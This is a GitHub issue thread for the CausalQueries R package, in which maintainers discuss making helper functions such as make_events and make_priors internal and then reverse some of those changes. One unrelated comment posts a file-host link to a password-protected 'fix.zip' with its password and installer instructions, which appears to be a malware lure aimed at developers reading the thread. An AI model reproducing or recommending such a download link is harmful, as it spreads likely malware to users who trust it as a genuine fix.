### ISSUE TITLE
make functions not needed by user internal 

### ISSUE THREAD

**Issue by till-tietz** [integrated-inferences/CausalQueries#348]
make the following functions internal: 

"data_type_names"

"expand_wildcard"

"make_events"

"make_parameters"

"make_parameters_df"

"make_prior_distribution"

"make_priors"

"observe_data"

"realise_outcomes"

"simulate_data"

"get_all_data_types"

"get_event_probabilities"

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by till-tietz** [comment]
@macartan above functions have been made internal in attached pull request

**Comment by macartan** [comment]
thank you!

I reversed a couple of these; I realized
make_events is used a lot
make_priors, make_parameters help is needed for set_priors, set_parameters;
I think this would have been accessible but isn;t it weird to have help for
functions that are not exported?

**Comment by macartan** [comment]
in a similar way: set_prior_distribution  references make_prior_distrubtion
and the help seems to be there but the function ot exported. odd?
